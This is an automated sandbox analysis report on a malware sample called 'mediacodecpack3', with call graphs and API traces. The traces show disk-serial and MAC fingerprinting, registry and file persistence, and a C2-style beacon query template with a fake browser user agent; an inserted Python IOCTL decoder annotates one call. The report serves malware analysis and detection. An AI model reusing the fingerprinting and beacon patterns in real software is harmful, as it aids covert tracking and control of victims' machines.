Mailbox 68 API calls 61361->61363 61365 2b93193 61361->61365 61362->61361 61363->61365 61364->61361 61365->61360 61366 2b9fb20 Mailbox 68 API calls 61365->61366 61366->61360 61367->61349 61369->60813 61370->60814 61621 40232e Sleep 61622 40209b 61621->61622 61623 40d55c GetStartupInfoA 61622->61623 61625 401f74 61622->61625 61623->61625 61624 40d720 61625->61624 61626 401301 7 API calls 
61625->61626 61627 40dc0d 61626->61627 61371 4016cf 61375 401897 61371->61375 61376 401d22 61375->61376 61377 40d55c GetStartupInfoA 61376->61377 61379 401f74 61376->61379 61377->61379 61378 40d720 61379->61378 61382 401301 FindResourceA 61379->61382 61381 40dc0d 61383 401367 SizeofResource 61382->61383 61388 401360 61382->61388 61384 401386 LoadResource LockResource GlobalAlloc 61383->61384 61383->61388 61385 4013cc 61384->61385 61386 40141f GetTickCount 61385->61386 61389 40142a GlobalAlloc 61386->61389 61388->61381 61389->61388 61628 2bcc80e 61629 2bcc812 61628->61629 61632 2b9e9ab LoadLibraryA 61629->61632 61630 2bcc817 61630->61630 61633 2b9ea8e 61632->61633 61634 2b9e9d4 GetProcAddress 61632->61634 61633->61630 61635 2b9ea87 FreeLibrary 61634->61635 61639 2b9e9e8 61634->61639 61635->61633 61636 2b9e9fa GetAdaptersInfo 61636->61639 61637 2b9ea82 61637->61635 61638 2ba27c5 _Allocate 60 API calls 61638->61639 61639->61636 61639->61637 61639->61638 61390 2bcc5af SHGetSpecialFolderPathA 61391 2bd07ce 61390->61391 61392 401b93 RegSetValueExA RegCloseKey 61393 40d143 61392->61393 61640 2b9104d 61641 2ba23b4 __cinit 68 API calls 61640->61641 61642 2b91057 61641->61642 61645 2b91aa9 InterlockedIncrement 61642->61645 61646 2b9105c 61645->61646 61647 2b91ac5 WSAStartup InterlockedExchange 61645->61647 61647->61646 61394 2c04616 61395 2c17646 InternetOpenA 61394->61395 61397 401e96 CreateDirectoryA 61398 40d036 61397->61398 61399 40d9d8 RegOpenKeyExA 61648 401878 RegCloseKey 61649 40dcf0 61648->61649 61649->61649 61400 401cdb CopyFileA 61650 40207b 61654 2ba2988 61650->61654 61655 2ba2991 61654->61655 61656 2ba2996 61654->61656 61668 2ba918c GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 61655->61668 61660 2ba29ab 61656->61660 61659 402080 Sleep 61661 2ba29b7 __ioinit 61660->61661 61663 2ba2a62 __ioinit 61661->61663 61665 2ba2a05 ___DllMainCRTStartup 61661->61665 61669 2ba2816 61661->61669 61663->61659 61664 2ba2816 __CRT_INIT@12 
138 API calls 61664->61663 61665->61663 61666 2ba2816 __CRT_INIT@12 138 API calls 61665->61666 61667 2ba2a3f 61665->61667 61666->61667 61667->61663 61667->61664 61668->61656 61670 2ba2822 __ioinit 61669->61670 61671 2ba282a 61670->61671 61672 2ba28a4 61670->61672 61717 2ba6e56 GetProcessHeap 61671->61717 61674 2ba28a8 61672->61674 61675 2ba290d 61672->61675 61679 2ba28c9 61674->61679 61707 2ba2833 __ioinit __CRT_INIT@12 61674->61707 61806 2ba7019 59 API calls _doexit 61674->61806 61676 2ba2912 61675->61676 61677 2ba2970 61675->61677 61680 2ba7d8b __threadstartex@4 TlsGetValue 61676->61680 61677->61707 61812 2ba4894 59 API calls 2 library calls 61677->61812 61678 2ba282f 61678->61707 61718 2ba4a04 61678->61718 61807 2ba6ef0 61 API calls _free 61679->61807 61685 2ba291d 61680->61685 61688 2ba762a __calloc_crt 59 API calls 61685->61688 61685->61707 61686 2ba28ce 61689 2ba28df __CRT_INIT@12 61686->61689 61808 2ba8e2a 60 API calls _free 61686->61808 61687 2ba283f __RTC_Initialize 61694 2ba284f GetCommandLineA 61687->61694 61687->61707 61690 2ba292e 61688->61690 61810 2ba28f8 62 API calls __mtterm 61689->61810 61690->61707 61811 2ba7daa TlsSetValue 61690->61811 61693 2ba28da 61809 2ba4a7a 62 API calls 2 library calls 61693->61809 61739 2ba9228 GetEnvironmentStringsW 61694->61739 61698 2ba2946 61700 2ba294c 61698->61700 61701 2ba2964 61698->61701 61703 2ba4951 __initptd 59 API calls 61700->61703 61704 2ba1f84 _free 59 API calls 61701->61704 61706 2ba2954 GetCurrentThreadId 61703->61706 61704->61707 61705 2ba2869 61708 2ba286d 61705->61708 61771 2ba8e7c 61705->61771 61706->61707 61707->61665 61804 2ba4a7a 62 API calls 2 library calls 61708->61804 61712 2ba288d 61712->61707 61805 2ba8e2a 60 API calls _free 61712->61805 61717->61678 61813 2ba70c0 36 API calls 2 library calls 61718->61813 61720 2ba4a09 61814 2ba75dc InitializeCriticalSectionAndSpinCount __ioinit 61720->61814 61722 2ba4a0e 61723 2ba4a12 61722->61723 61816 2ba7d4e TlsAlloc 61722->61816 61815 2ba4a7a 62 API 
calls 2 library calls 61723->61815 61726 2ba4a24 61726->61723 61728 2ba4a2f 61726->61728 61727 2ba4a17 61727->61687 61729 2ba762a __calloc_crt 59 API calls 61728->61729 61730 2ba4a3c 61729->61730 61731 2ba4a71 61730->61731 61817 2ba7daa TlsSetValue 61730->61817 61818 2ba4a7a 62 API calls 2 library calls 61731->61818 61734 2ba4a50 61734->61731 61736 2ba4a56 61734->61736 61735 2ba4a76 61735->61687 61737 2ba4951 __initptd 59 API calls 61736->61737 61738 2ba4a5e GetCurrentThreadId 61737->61738 61738->61687 61741 2ba923b 61739->61741 61744 2ba285f 61739->61744 61740 2ba9253 WideCharToMultiByte 61742 2ba926e 61740->61742 61743 2ba92a5 FreeEnvironmentStringsW 61740->61743 61741->61740 61741->61741 61819 2ba7672 59 API calls 2 library calls 61742->61819 61743->61744 61752 2ba8b76 61744->61752 61746 2ba9274 61746->61743 61747 2ba927b WideCharToMultiByte 61746->61747 61748 2ba929a FreeEnvironmentStringsW 61747->61748 61749 2ba9291 61747->61749 61748->61744 61750 2ba1f84 _free 59 API calls 61749->61750 61751 2ba9297 61750->61751 61751->61748 61753 2ba8b82 __ioinit 61752->61753 61754 2ba74ab __lock 59 API calls 61753->61754 61755 2ba8b89 61754->61755 61756 2ba762a __calloc_crt 59 API calls 61755->61756 61757 2ba8b9a 61756->61757 61758 2ba8c05 GetStartupInfoW 61757->61758 61759 2ba8ba5 __ioinit @_EH4_CallFilterFunc@8 61757->61759 61760 2ba8d49 61758->61760 61767 2ba8c1a 61758->61767 61759->61705 61761 2ba8e11 61760->61761 61765 2ba8d96 GetStdHandle 61760->61765 61766 2ba8da9 GetFileType 61760->61766 61821 2ba7dcc InitializeCriticalSectionAndSpinCount 61760->61821 61822 2ba8e21 RtlLeaveCriticalSection _doexit 61761->61822 61763 2ba8c68 61763->61760 61768 2ba8c9c GetFileType 61763->61768 61820 2ba7dcc InitializeCriticalSectionAndSpinCount 61763->61820 61764 2ba762a __calloc_crt 59 API calls 61764->61767 61765->61760 61766->61760 61767->61760 61767->61763 61767->61764 61768->61763 61772 2ba8e8a 61771->61772 61773 2ba8e8f GetModuleFileNameA 61771->61773 61829 2ba3efa 71 API calls 
__setmbcp 61772->61829 61775 2ba8ebc 61773->61775 61823 2ba8f2f 61775->61823 61777 2ba2879 61777->61712 61782 2ba90ab 61777->61782 61780 2ba8ef5 61780->61777 61781 2ba8f2f _parse_cmdline 59 API calls 61780->61781 61781->61777 61783 2ba90b4 61782->61783 61785 2ba90b9 _strlen 61782->61785 61833 2ba3efa 71 API calls __setmbcp 61783->61833 61786 2ba762a __calloc_crt 59 API calls 61785->61786 61789 2ba2882 61785->61789 61794 2ba90ef _strlen 61786->61794 61787 2ba9141 61788 2ba1f84 _free 59 API calls 61787->61788 61788->61789 61789->61712 61798 2ba7028 61789->61798 61790 2ba762a __calloc_crt 59 API calls 61790->61794 61791 2ba9168 61793 2ba1f84 _free 59 API calls 61791->61793 61793->61789 61794->61787 61794->61789 61794->61790 61794->61791 61795 2ba917f 61794->61795 61834 2ba592c 59 API calls 2 library calls 61794->61834 61835 2ba3b75 8 API calls 2 library calls 61795->61835 61797 2ba918b 61799 2ba7034 __IsNonwritableInCurrentImage 61798->61799 61836 2baab8f 61799->61836 61801 2ba7052 __initterm_e 61802 2ba23b4 __cinit 68 API calls 61801->61802 61803 2ba7071 _doexit __IsNonwritableInCurrentImage 61801->61803 61802->61803 61803->61712 61804->61707 61805->61708 61806->61679 61807->61686 61808->61693 61809->61689 61810->61707 61811->61698 61812->61707 61813->61720 61814->61722 61815->61727 61816->61726 61817->61734 61818->61735 61819->61746 61820->61763 61821->61760 61822->61759 61825 2ba8f51 61823->61825 61828 2ba8fb5 61825->61828 61831 2baef96 59 API calls x_ismbbtype_l 61825->61831 61826 2ba8ed2 61826->61777 61830 2ba7672 59 API calls 2 library calls 61826->61830 61828->61826 61832 2baef96 59 API calls x_ismbbtype_l 61828->61832 61829->61773 61830->61780 61831->61825 61832->61828 61833->61785 61834->61794 61835->61797 61837 2baab92 RtlEncodePointer 61836->61837 61837->61837 61838 2baabac 61837->61838 61838->61801 61401 2b9e8a7 CreateFileA 61402 2b9e9a3 61401->61402 61406 2b9e8d8 61401->61406 61403 2b9e8f0 DeviceIoControl 61403->61406 61404 2b9e999 CloseHandle 
61404->61402 61405 2b9e965 GetLastError 61405->61404 61405->61406 61406->61403 61406->61404 61406->61405 61406->61406 61407 2ba27c5 _Allocate 60 API calls 61406->61407 61407->61406

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 238 2b95e5e-2b960ec RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call 2b942c7 GetTickCount call 2b959fa GetVersionExA call 2ba3760 call 2ba1fbc * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2ba3760 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2ba1fbc * 4 QueryPerformanceCounter Sleep call 2ba1fbc * 2 call 2ba3760 * 2 283 2b960f0-2b960f2 238->283 284 2b960fb-2b960fd 283->284 285 2b960f4-2b960f9 283->285 287 2b9610a-2b96448 RtlEnterCriticalSection RtlLeaveCriticalSection 284->287 288 2b960ff 284->288 286 2b96104 Sleep 285->286 286->287 290 2b9644a-2b96450 287->290 291 2b96464-2b9646e 287->291 288->286 292 2b96452-2b96454 290->292 293 2b96456-2b96463 call 2b9534d 290->293 291->283 294 2b96474-2b96498 call 2ba3760 call 2b9439c 291->294 292->291 293->291 294->283 301 2b9649e-2b964c9 RtlEnterCriticalSection RtlLeaveCriticalSection call 2ba134c 294->301 304 2b964cb-2b964da call 2ba134c 301->304 305 2b96513-2b9652b call 2ba134c 301->305 304->305 312 2b964dc-2b964eb call 2ba134c 304->312 310 2b96531-2b96533 305->310 311 2b967d2-2b967e1 call 2ba134c 305->311 310->311 314 2b96539-2b965e4 call 2ba1fbc RtlEnterCriticalSection RtlLeaveCriticalSection call 2ba3760 * 5 call 2b9439c * 2 310->314 319 2b967e3-2b967e5 311->319 320 2b96826-2b96835 call 2ba134c 311->320 312->305 322 2b964ed-2b964fc call 2ba134c 312->322 364 2b96621 314->364 365 2b965e6-2b965e8 314->365 319->320 323 2b967e7-2b96821 call 2ba3760 RtlEnterCriticalSection RtlLeaveCriticalSection 319->323 333 2b9684a-2b96859 call 2ba134c 320->333 334 2b96837-2b96840 call 2b95c11 call 2b95d1f 320->334 322->305 335 2b964fe-2b9650d call 2ba134c 322->335 323->283 333->283 344 2b9685f-2b96861 333->344 347 2b96845 334->347 335->283 335->305 344->283 348 2b96867-2b96880 call 2b9439c 344->348 347->283 348->283 
355 2b96886-2b96955 call 2ba1428 call 2b91ba7 348->355 366 2b9695c-2b9697d RtlEnterCriticalSection 355->366 367 2b96957 call 2b9143f 355->367 371 2b96625-2b96653 call 2ba1fbc call 2ba3760 call 2b9439c 364->371 365->364 370 2b965ea-2b965fc call 2ba134c 365->370 368 2b96989-2b969f0 RtlLeaveCriticalSection call 2b93c67 call 2b93d7e call 2b9733f 366->368 369 2b9697f-2b96986 366->369 367->366 392 2b96b58-2b96b6c call 2b98007 368->392 393 2b969f6-2b96a38 call 2b99729 368->393 369->368 370->364 381 2b965fe-2b9661f call 2b9439c 370->381 390 2b96655-2b96664 call 2ba25f6 371->390 391 2b96694-2b9669d call 2ba1f84 371->391 381->371 390->391 404 2b96666 390->404 402 2b967c0-2b967cd 391->402 403 2b966a3-2b966bb call 2ba27c5 391->403 392->283 405 2b96a3e-2b96a45 393->405 406 2b96b22-2b96b33 call 2b973ee 393->406 402->283 415 2b966bd-2b966c5 call 2b9873b 403->415 416 2b966c7 403->416 408 2b9666b-2b9667d call 2ba1860 404->408 410 2b96a48-2b96a4d 405->410 413 2b96b38-2b96b53 call 2b933b2 406->413 422 2b9667f 408->422 423 2b96682-2b96692 call 2ba25f6 408->423 410->410 414 2b96a4f-2b96a94 call 2b99729 410->414 413->392 414->406 425 2b96a9a-2b96aa0 414->425 421 2b966c9-2b96757 call 2b99853 call 2b93863 call 2b95119 call 2b93863 call 2b99af9 call 2b99c13 415->421 416->421 447 2b9675c-2b9676d 421->447 422->423 423->391 423->408 429 2b96aa3-2b96aa8 425->429 429->429 432 2b96aaa-2b96ae5 call 2b99729 429->432 432->406 438 2b96ae7-2b96b1b call 2b9c11b 432->438 443 2b96b20-2b96b21 438->443 443->406 448 2b9676f call 2b9380b 447->448 449 2b96774-2b9679f Sleep call 2ba0900 447->449 448->449 453 2b967ab-2b967b9 449->453 454 2b967a1-2b967aa call 2b94100 449->454 453->402 456 2b967bb call 2b9380b 453->456 454->453 456->402
                                                                                            APIs
                                                                                            • RtlInitializeCriticalSection.NTDLL(02BC4FD0), ref: 02B95E92
                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02B95EA9
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02B95EB2
                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02B95EC1
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02B95EC4
                                                                                            • GetTickCount.KERNEL32 ref: 02B95ED8
                                                                                              • Part of subcall function 02B959FA: _malloc.LIBCMT ref: 02B95A08
                                                                                            • GetVersionExA.KERNEL32(02BC4E20), ref: 02B95F05
                                                                                            • _malloc.LIBCMT ref: 02B95F31
                                                                                              • Part of subcall function 02BA1FBC: __FF_MSGBANNER.LIBCMT ref: 02BA1FD3
                                                                                              • Part of subcall function 02BA1FBC: __NMSG_WRITE.LIBCMT ref: 02BA1FDA
                                                                                              • Part of subcall function 02BA1FBC: RtlAllocateHeap.NTDLL(007C0000,00000000,00000001), ref: 02BA1FFF
                                                                                            • _malloc.LIBCMT ref: 02B95F41
                                                                                            • _malloc.LIBCMT ref: 02B95F4C
                                                                                            • _malloc.LIBCMT ref: 02B95F57
                                                                                            • _malloc.LIBCMT ref: 02B95F62
                                                                                            • _malloc.LIBCMT ref: 02B95F6D
                                                                                            • _malloc.LIBCMT ref: 02B95F78
                                                                                            • _malloc.LIBCMT ref: 02B95F84
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02B95F9B
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02B95FA4
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02B95FB0
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02B95FB3
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02B95FBE
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02B95FC1
                                                                                            • RtlEnterCriticalSection.NTDLL(02BC4FD0), ref: 02B95FF8
                                                                                            • RtlLeaveCriticalSection.NTDLL(02BC4FD0), ref: 02B96005
                                                                                            • _malloc.LIBCMT ref: 02B96026
                                                                                            • _malloc.LIBCMT ref: 02B96034
                                                                                            • _malloc.LIBCMT ref: 02B9603B
                                                                                            • _malloc.LIBCMT ref: 02B9605C
                                                                                            • QueryPerformanceCounter.KERNEL32(00000200), ref: 02B96068
                                                                                            • Sleep.KERNELBASE(00000000), ref: 02B96076
                                                                                            • _malloc.LIBCMT ref: 02B96082
                                                                                            • _malloc.LIBCMT ref: 02B96092
                                                                                            • Sleep.KERNELBASE(0000EA60), ref: 02B96104
                                                                                            • RtlEnterCriticalSection.NTDLL(02BC4FD0), ref: 02B9610F
                                                                                            • RtlLeaveCriticalSection.NTDLL(02BC4FD0), ref: 02B96120
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _malloc$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                            • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$OQ$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
                                                                                            • API String ID: 4273019447-1738318132
                                                                                            • Opcode ID: d0e3d35ccdadefa9ce1ea79706057a80011bafce15efcf2a1893262fdeb597c5
                                                                                            • Instruction ID: b46901e65805a1d19e67e767a5af7455536e8e381697446f6fad80615c54c5f0
                                                                                            • Opcode Fuzzy Hash: d0e3d35ccdadefa9ce1ea79706057a80011bafce15efcf2a1893262fdeb597c5
                                                                                            • Instruction Fuzzy Hash: 9A71E2B1D4C3809FE321AF38AC65B5BBBE8AF59350F5009ADF58897341DBB459008F96

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 791 2b9e9ab-2b9e9ce LoadLibraryA 792 2b9ea8e-2b9ea95 791->792 793 2b9e9d4-2b9e9e2 GetProcAddress 791->793 794 2b9e9e8-2b9e9f8 793->794 795 2b9ea87-2b9ea88 FreeLibrary 793->795 796 2b9e9fa-2b9ea06 GetAdaptersInfo 794->796 795->792 797 2b9ea08 796->797 798 2b9ea3e-2b9ea46 796->798 799 2b9ea0a-2b9ea11 797->799 800 2b9ea48-2b9ea4e call 2ba26df 798->800 801 2b9ea4f-2b9ea54 798->801 802 2b9ea1b-2b9ea23 799->802 803 2b9ea13-2b9ea17 799->803 800->801 805 2b9ea82-2b9ea86 801->805 806 2b9ea56-2b9ea59 801->806 809 2b9ea26-2b9ea2b 802->809 803->799 808 2b9ea19 803->808 805->795 806->805 807 2b9ea5b-2b9ea60 806->807 811 2b9ea6d-2b9ea78 call 2ba27c5 807->811 812 2b9ea62-2b9ea6a 807->812 808->798 809->809 813 2b9ea2d-2b9ea3a call 2b9e6fa 809->813 811->805 818 2b9ea7a-2b9ea7d 811->818 812->811 813->798 818->796
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 02B9E9C1
                                                                                            • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02B9E9DA
                                                                                            • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02B9E9FF
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 02B9EA88
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                            • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                            • API String ID: 514930453-3114217049
                                                                                            • Opcode ID: 335704bfa687c38aceaefb30423917ec5f7f7f1044a2e313b4b8f30b72fb38a5
                                                                                            • Instruction ID: 0803a86750ce3bfa67440ebc889002f12cef2fd4709075135f1e000b4cf78ef5
                                                                                            • Opcode Fuzzy Hash: 335704bfa687c38aceaefb30423917ec5f7f7f1044a2e313b4b8f30b72fb38a5
                                                                                            • Instruction Fuzzy Hash: F421A271A042099BDF21DBA888846EEBBB8FF09314F1440FAE915E7251E770DE45CBA0

                                                                                             Control-flow Graph (graph image not preserved; summary of the basic-block listing)
                                                                                             • Function 2b92b95-2b92d38; API calls along the path: WSASetLastError → WSARecv, then WSASetLastError → select in the retry loop; internal calls: 2b9fb20, 2b9950d, 2b9166f, 2b91996
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02B92BE4
                                                                                            • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02B92C07
                                                                                              • Part of subcall function 02B9950D: WSAGetLastError.WS2_32(00000000,?,?,02B92A51), ref: 02B9951B
                                                                                            • WSASetLastError.WS2_32 ref: 02B92CD3
                                                                                            • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02B92CE7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$Recvselect
                                                                                            • String ID: 3'
                                                                                            • API String ID: 886190287-280543908
                                                                                            • Opcode ID: 40a2da0044f76bf1f4834aae64ced3d907c9388a831652b1819106a2ee47e475
                                                                                            • Instruction ID: e1177850e208d2c78b5c82d0145b8cc18bea4a4511180f6055b6cc775b748118
                                                                                            • Opcode Fuzzy Hash: 40a2da0044f76bf1f4834aae64ced3d907c9388a831652b1819106a2ee47e475
                                                                                            • Instruction Fuzzy Hash: 81416FB1905301AFDF109F78C5147ABBBE9EF94364F1049AEE899C7280EB70D541CB92

                                                                                             Control-flow Graph (graph image not preserved; summary of the basic-block listing)
                                                                                             • Function 2b9e8a7-2b9e9aa; API calls along the path: CreateFileA → DeviceIoControl (retried from 2b9e98e) → GetLastError → CloseHandle; internal calls: 2ba26df, 2ba27c5, 2b9e6fa
                                                                                            APIs
                                                                                            • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02B9E8C6
                                                                                            • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02B9E904
                                                                                            • GetLastError.KERNEL32 ref: 02B9E965
                                                                                            • CloseHandle.KERNELBASE(?), ref: 02B9E99C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                            • String ID: \\.\PhysicalDrive0
                                                                                            • API String ID: 4026078076-1180397377
                                                                                            • Opcode ID: 89b02391e7b8346f84f73cecd3165ac62f345c0437d44726b233de6ea3fdb1ef
                                                                                            • Instruction ID: fdac0603dae35585beb561387a704e6ff70cea0dd7e3c2d767ff94c70472a7e9
                                                                                            • Opcode Fuzzy Hash: 89b02391e7b8346f84f73cecd3165ac62f345c0437d44726b233de6ea3fdb1ef
                                                                                            • Instruction Fuzzy Hash: 5331A371D00215EFDF24CF99D894BAEBBB8FF05754F6045BAE605A7280D7B09A04CBA0
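The DeviceIoControl call above passes control code 0x002D1400. Split with the CTL_CODE layout from winioctl.h this is device type 0x2D (FILE_DEVICE_MASS_STORAGE), function 0x500, METHOD_BUFFERED, FILE_ANY_ACCESS, i.e. IOCTL_STORAGE_QUERY_PROPERTY; the 0xC-byte input buffer matches sizeof(STORAGE_PROPERTY_QUERY), and CreateFileA opens \\.\PhysicalDrive0 with dwDesiredAccess = 0, which lets an unprivileged process query device attributes without reading or writing the disk. The arguments are therefore consistent with reading the drive descriptor (vendor and serial number) for host fingerprinting; a handle opened with desired access 0 cannot write to the device, so this call alone does not show boot-sector modification. The decoder below is an added example, not code from the report or from the sample; the constant tables are taken from the Windows SDK headers (winioctl.h, ntddstor.h, ntdddisk.h) and any code outside KNOWN_IOCTLS is reported as UNKNOWN.

```python
# Added example: decode a Windows IOCTL control code as it appears in a sandbox API trace.
# Not part of the Joe Sandbox report or the sample. Constants are from the Windows SDK.

from dataclasses import dataclass

# Device-type prefixes (winioctl.h). Only the ones this decoder names; any other
# value is rendered numerically.
DEVICE_TYPES = {
    0x02: "FILE_DEVICE_CD_ROM",
    0x07: "FILE_DEVICE_DISK",
    0x09: "FILE_DEVICE_FILE_SYSTEM",
    0x12: "FILE_DEVICE_NETWORK",
    0x22: "FILE_DEVICE_UNKNOWN",
    0x2D: "FILE_DEVICE_MASS_STORAGE",
}
METHODS = ("METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER")
ACCESS = ("FILE_ANY_ACCESS", "FILE_READ_ACCESS", "FILE_WRITE_ACCESS",
          "FILE_READ_ACCESS|FILE_WRITE_ACCESS")


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """The CTL_CODE() macro from winioctl.h."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


# Codes a disk-fingerprinting routine typically sends to \\.\PhysicalDriveN.
KNOWN_IOCTLS = {
    ctl_code(0x2D, 0x0500, 0, 0): "IOCTL_STORAGE_QUERY_PROPERTY",     # 0x002D1400
    ctl_code(0x2D, 0x0420, 0, 0): "IOCTL_STORAGE_GET_DEVICE_NUMBER",  # 0x002D1080
    ctl_code(0x07, 0x0000, 0, 0): "IOCTL_DISK_GET_DRIVE_GEOMETRY",    # 0x00070000
    ctl_code(0x07, 0x0028, 0, 0): "IOCTL_DISK_GET_DRIVE_GEOMETRY_EX", # 0x000700A0
    ctl_code(0x07, 0x0022, 0, 3): "SMART_RCV_DRIVE_DATA",             # 0x0007C088
}


@dataclass(frozen=True)
class Ioctl:
    code: int
    device_type: int   # bits 16-31
    function: int      # bits 2-13
    method: int        # bits 0-1
    access: int        # bits 14-15

    @property
    def name(self) -> str:
        return KNOWN_IOCTLS.get(self.code, "UNKNOWN")

    @property
    def device_name(self) -> str:
        return DEVICE_TYPES.get(self.device_type, f"0x{self.device_type:02X}")


def decode_ioctl(code: int) -> Ioctl:
    """Split a 32-bit control code into its CTL_CODE fields."""
    return Ioctl(
        code=code,
        device_type=(code >> 16) & 0xFFFF,
        access=(code >> 14) & 0x3,
        function=(code >> 2) & 0xFFF,
        method=code & 0x3,
    )


def describe_ioctl(code: int) -> str:
    """One-line rendering suitable for annotating an API trace."""
    d = decode_ioctl(code)
    return (f"0x{code:08X} = {d.name} (device={d.device_name}, "
            f"function=0x{d.function:03X}, {METHODS[d.method]}, {ACCESS[d.access]})")


if __name__ == "__main__":
    # The control code the report shows being passed to DeviceIoControl on \\.\PhysicalDrive0.
    print(describe_ioctl(0x002D1400))
```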

                                                                                             Control-flow Graph (graph image not preserved; summary of the basic-block listing)
                                                                                             • Function 401951-40e02e; API calls along the path: GetLocalTime → StartServiceCtrlDispatcherA → lstrcmpiW
                                                                                            APIs
                                                                                            • GetLocalTime.KERNEL32(0040BE00), ref: 00401B4D
                                                                                            • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040DF4C
                                                                                            • lstrcmpiW.KERNELBASE(?,/chk), ref: 0040E028
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: CtrlDispatcherLocalServiceStartTimelstrcmpi
                                                                                            • String ID: /chk
                                                                                            • API String ID: 4108452588-3837807730
                                                                                            • Opcode ID: b98aab331838fe6632ee09d3ee6537478d9e654e437189eacf188a04f6302d0c
                                                                                            • Instruction ID: c0b6fb2c802bab406561895994aa9e9237411ab6f3462ae67dbec63e80f3bd48
                                                                                            • Opcode Fuzzy Hash: b98aab331838fe6632ee09d3ee6537478d9e654e437189eacf188a04f6302d0c
                                                                                            • Instruction Fuzzy Hash: 4121D070904658CBDB048B609E697E63BF4AB06340F0081BAC886F72E2D738890ADB19

                                                                                             Control-flow Graph (graph image not preserved; summary of the basic-block listing)
                                                                                             • Function entry 2b95de1, blocks spanning 2b95d0b-2b96b6c; initialisation path: RtlInitializeCriticalSection → GetModuleHandleA/GetProcAddress (×2) → GetTickCount → GetVersionExA → GetProcessHeap/RtlAllocateHeap (×3) → RtlEnterCriticalSection/RtlLeaveCriticalSection → QueryPerformanceCounter → Sleep; the main loop from 2b960f0 repeats Sleep and RtlEnterCriticalSection/RtlLeaveCriticalSection around the internal calls
                                                                                            APIs
                                                                                            • RtlInitializeCriticalSection.NTDLL(02BC4FD0), ref: 02B95E92
                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02B95EA9
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02B95EB2
                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02B95EC1
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02B95EC4
                                                                                            • GetTickCount.KERNEL32 ref: 02B95ED8
                                                                                            • GetVersionExA.KERNEL32(02BC4E20), ref: 02B95F05
                                                                                            • _malloc.LIBCMT ref: 02B95F31
